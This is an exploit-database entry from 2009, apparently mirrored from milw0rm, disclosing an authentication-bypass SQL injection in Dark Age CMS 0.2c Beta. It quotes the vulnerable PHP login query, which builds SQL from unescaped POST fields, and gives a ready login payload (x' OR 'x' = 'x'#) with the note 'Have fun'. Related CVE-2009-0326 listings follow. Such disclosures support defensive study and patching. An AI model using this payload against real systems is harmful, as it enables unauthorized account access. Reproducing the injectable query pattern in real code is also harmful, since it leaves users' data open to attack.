Lucene search
DarkjokerEDB-ID:7758HistoryJan 13, 2009 - 12:00 a.m.
Dark Age CMS 0.2c Beta - Authentication Bypass
2009-01-1300:00:00
darkjoker
www.exploit-db.com
21
AI Score
7.4
Confidence
Low
--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--
[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site : http://darkjoker.net23.net
[+] Notes : Have fun
[+] Code
[+] $username = $_POST['username'];
[+] $user_password = $_POST['password'];
[+] $password = md5($user_password);
[+]
[+] $query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+] $result = mysql_query($query) or die('error making query');
[+]
[+] Login data:
[+] Username: x' OR 'x' = 'x'#
[+] Password: anything
# milw0rm.com [2009-01-13]Related
exploitdb
exploitdb
Dark Age CMS 2.0 - 'login.php' SQL Injection
2009-01-14 00:00:00
prion
prion
Sql injection
2009-01-29 18:30:00
cve
cve
CVE-2009-0326
2009-01-29 18:30:02
cvelist
cvelist
CVE-2009-0326
2009-01-29 18:09:00
nvd
nvd
CVE-2009-0326
2009-01-29 18:30:02